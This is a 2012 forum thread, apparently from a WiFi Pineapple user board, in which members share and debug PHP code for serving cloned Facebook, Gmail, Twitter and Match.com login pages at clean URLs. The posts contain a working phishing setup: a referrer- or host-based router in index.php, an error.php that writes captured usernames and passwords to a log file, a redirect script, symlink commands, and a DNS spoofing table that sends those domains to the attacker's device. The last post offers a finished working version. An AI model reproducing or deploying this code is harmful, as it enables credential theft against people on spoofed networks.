PineDominator Posted July 27, 2012 Share Posted July 27, 2012 (edited) Just like what I did with my random roll php version 2 I thought I would start a post to get clean links for phishing. Clean links IE example.com and not example.com/phish/example.html change /www/index.php to <?php$ref = $_SERVER['HTTP_REFERER'];$phishFolder = "phish/"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish"$skipInclude = 0;if (strpos($ref, "facebook")){$phishFile = "facebook.html";} elseif (strpos($ref, "gmail")) {$phishFile = "gmail.html";} elseif (strpos($ref, "twitter")) {$phishFile = "twitter.html";} else {require('error.php');$skipInclude = 1;}if ($skipInclude == 0) {include($phishFolder.$phishFile);}?>[/CODE]then add your phish pages to your thumb drive to say /usb/phish/you can sym link to the /www/ folder[CODE]ln -s /usb/phish /www/phish[/CODE]now I am expecting your phishing setup to look like this/usb/phish/example.htmland the source files could go into a folder like/usb/phish/example/however you want to manage themlast thing to do is edit all the .html files so that any links to the source folder include the phish/ folder IE "/phish/example/banner.jpg"what do you guys think? is this how phishing should be done from now on? Edited July 27, 2012 by petertfm Quote Link to comment Share on other sites More sharing options...
Neworld Posted July 27, 2012 Share Posted July 27, 2012 You don't have to do usb/.... you can create a symbolic ling in the /www/ folder. Here's a guy that made a video on it. Either way works though... Quote Link to comment Share on other sites More sharing options...
PineDominator Posted July 27, 2012 Author Share Posted July 27, 2012 You don't have to do usb/.... you can create a symbolic ling in the /www/ folder. Here's a guy that made a video on it. Either way works though... you could just put it in /www/phish/ but that would fill the little bit of memory the mk4 has and using the usb is a good standard. I did explain how to sym link;-) ln -s /usb/phish /www/phish[/CODE] Quote Link to comment Share on other sites More sharing options...
loozr Posted August 9, 2012 Share Posted August 9, 2012 Hi there! First of all thank you so much for sharing all your work! It's much appreciated! However I seem to have some problems making this work. I'ts probably just me beeing stupid.. My phish files should be okay, at least they work nice whith "the original method". My problem is that with this method without folder names my phishfiles just won't work. All that happens when i try to open i.e. facebook is that the page either does nothing, or goes back to the previous page. The code of the page is then showing up as: <html><head><script type="text/javascript">function goBack(){window.history.back()}</script></head><body onload="goBack()"></body></html>[/CODE]Which actually seems to be the last part of my error.php. I just don't understand why the browser would go directly to error.php, before the phishingpage..My error.php[CODE]<?php$ref = $_SERVER['HTTP_REFERER'];$today = date("F j, Y, g:i a");if (isset($_POST['name']) && !empty($_POST['name'])) {$nam = stripslashes($_POST['name']);$pas = stripslashes($_POST['pass']);$nam = htmlspecialchars($nam, ENT_QUOTES);$pas = htmlspecialchars($pas, ENT_QUOTES);$content = $today . " -- " . $ref . " -- " . $nam . " -- " . $pas;$filed = @fopen("pineapple/logs/phish.log", "a+");@fwrite($filed, "$content\n");@fclose($filed);}?><html><head><script type="text/javascript">function goBack(){window.history.back()}</script></head><body onload="goBack()"></body></html>[/CODE]So my index.php looks like this.[CODE]<?php$ref = $_SERVER['HTTP_REFERER'];$phishFolder = "./"; # Folder where your phishing files exist, Sym link from usb thumb drive "ln -s /usb/phishing-folder /www/phish"$skipInclude = 0;if (strpos($ref, "facebook")){$phishFile = "facebook.htm";} elseif (strpos($ref, "gmail")) {$phishFile = "gmail.html";} elseif (strpos($ref, "twitter")) {$phishFile = "twitter.htm";} else {require('error.php');$skipInclude = 1;}if ($skipInclude == 0) {include($phishFolder.$phishFile);}?>[/CODE]I have symlinked /usb/phish/* to /www/ thats why I have "./" as phishfolder. And I don't yet have anything for gmail, but facebook and twitter should still work. I think like this I would not have to edit all the links for facebook_files folder, right?ls -l /www[CODE]root@Pineapple:~# ls -l /wwwlrwxrwxrwx 1 root root 30 Aug 9 11:32 accounts.google.htm -> /usb/phish/accounts.google.htmlrwxrwxrwx 1 root root 32 Aug 9 11:32 accounts.google_files -> /usb/phish/accounts.google_files-rw-r--r-- 1 root root 621 Aug 9 10:32 error.phplrwxrwxrwx 1 root root 23 Aug 9 11:21 facebook.htm -> /usb/phish/facebook.htmlrwxrwxrwx 1 root root 25 Aug 9 11:21 facebook_files -> /usb/phish/facebook_files-rw-r--r-- 1 root root 496 Aug 9 14:16 index.php-rw-r--r-- 1 root root 113 Jun 5 18:42 indexORG.phplrwxrwxrwx 1 root root 23 Aug 9 12:11 matchcom.htm -> /usb/phish/matchcom.htmdrwxr-xr-x 1 root root 0 Jul 2 01:28 pineapple-rw-r--r-- 1 root root 490 Aug 9 12:41 redirect.phplrwxrwxrwx 1 root root 22 Aug 9 11:32 twitter.htm -> /usb/phish/twitter.htmlrwxrwxrwx 1 root root 24 Aug 9 11:32 twitter_files -> /usb/phish/twitter_files[/CODE]And my DNS spoof config states:[CODE]172.16.42.1 facebook.com172.16.42.1 www.facebook.com172.16.42.1 match.com172.16.42.1 accounts.google.com172.16.42.1 twitter.com[/CODE]Oh, and my redirect.php[CODE]<?php$ref = $_SERVER['HTTP_REFERER'];if (strpos($ref, "facebook")){ header('Location: facebook.htm'); }if (strpos($ref, "match")){ header('Location: matchcom.htm'); }if (strpos($ref, "accounts.google")){ header('Location: accounts.google.htm'); }if (strpos($ref, "gmail")){ header('Location: accounts.google.htm'); }if (strpos($ref, "twitter")){ header('Location: twitter.htm'); }require('error.php');?>[/CODE]Any help will be appreciated! :) Quote Link to comment Share on other sites More sharing options...
PineDominator Posted August 9, 2012 Author Share Posted August 9, 2012 a lot a data:-D question when you said you sym linked the phish folder what does it look like in /www/? I see in the index.php you put "./" that would be an error, if the phish files are directly in /www/ then this shoul be empty ie "" I hope this helps ps I did not try out my own code and there could be errors or bugs. Quote Link to comment Share on other sites More sharing options...
loozr Posted August 10, 2012 Share Posted August 10, 2012 Thanks for you reply! And I'm sorry about the amount of data that i pasted, just wasn't sure about what you needed to know. Actually I pasted the ls of the /www folder right after my index.php in my previous post. Just to clarify my facebook files looks like this /www/facebook.htm /www/facebook_files/ The thing is, I have tried to put both "./" and nothing ie "" but in any case I'm just seeing an empty page, whith the code as mentioned in my previous post. But if i try to enter direct url i.e. 172.16.42.1/facebook.htm then the facebook page appears as it should, and phishing works as intended. I just can't seem to understand what I did wrong. Quote Link to comment Share on other sites More sharing options...
loozr Posted August 10, 2012 Share Posted August 10, 2012 (edited) Actually it seem I got it working when i changed the start of the index.php. as Neworld suggested in another thread. I also changed the line that require error.php, into redirect.php. Aand in my case I have all the phish files symlinked directly to /www/ so I have edited out the $phishFolder since I didn't need it. Pasting the complete working index.php <?php$ref = "http://".$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI'];$skipInclude = 0;if (strpos($ref, "facebook")) { $phishFile = "facebook.htm";} elseif (strpos($ref, "gmail")) { $phishFile = "gmail.htm";} elseif (strpos($ref, "twitter")) { $phishFile = "twitter.htm";} else { require('redirect.php');$skipInclude = 1;}if ($skipInclude == 0) {include($phishFile);}?>[/CODE]And so far it seems to be working like a charm! :) Edited August 10, 2012 by loozr Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.